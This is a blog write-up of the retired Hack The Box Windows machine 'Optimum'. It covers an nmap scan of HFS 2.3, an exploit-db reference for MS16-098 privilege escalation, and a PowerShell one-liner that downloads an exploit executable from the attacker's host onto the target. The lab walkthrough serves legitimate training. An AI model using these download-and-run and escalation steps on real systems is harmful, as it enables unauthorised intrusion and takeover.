Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Optimum

Imported · Chris Ruggieri

Name: Optimum
Release Date: 18 Mar 2017
Retire Date: 28 Oct 2017
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
adxn37 17 days, 13 hours, 48 mins, 44 seconds
admin 18 days, 08 hours, 34 mins, 38 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension
Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code

Optimum

Again, we start with nmap -sC -sV -oA ./optimum -Pn 10.10.10.8

 
$  nmap -sC -sV -oA ./optimum -Pn 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 14:34 EDT                                            
Nmap scan report for 10.10.10.8                                                                            
Host is up (0.072s latency).                                                                               
Not shown: 999 filtered ports                                                                              
PORT   STATE SERVICE VERSION                                                                               
80/tcp open  http    HttpFileServer httpd 2.3                                                              
|_http-server-header: HFS 2.3                                                                              
|_http-title: HFS /                                                                                        
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                                   
                                                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds
 

Web only, so far.  While I dig into the web portal, I'm going to rescan, but with all ports.  The Web Portal seems to be and HTTP File Server (HFS).  There's a Metasploit module, but again, Metasploit makes us lazy.  Instead, consult the great Google-Fu Master.

And with that bit of lovely, we have a shell as Kostas and the User flag.  Run systeminfo and then copy and paste the output into a text file on your attacking machine.  You're going to need it in a moment.

 

Run the system info txt file through the Windows Exploit Suggester and you'll see this box is vulnerable to damn near everything.  The one that matters though is:

 
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)                   
 

So, we can grab the exploit here.  Now, to get it over to the target box and execute it.  We can do that with:

 

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.10/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

 

and then just run it from the target.  Grab your root flag and get your party on.

 

©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
  Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
  This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
  This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity

(GET WRITTEN PERMISSION PEOPLE!!)
  Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
  Contact the external sites for answers to questions regarding its content.
  This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.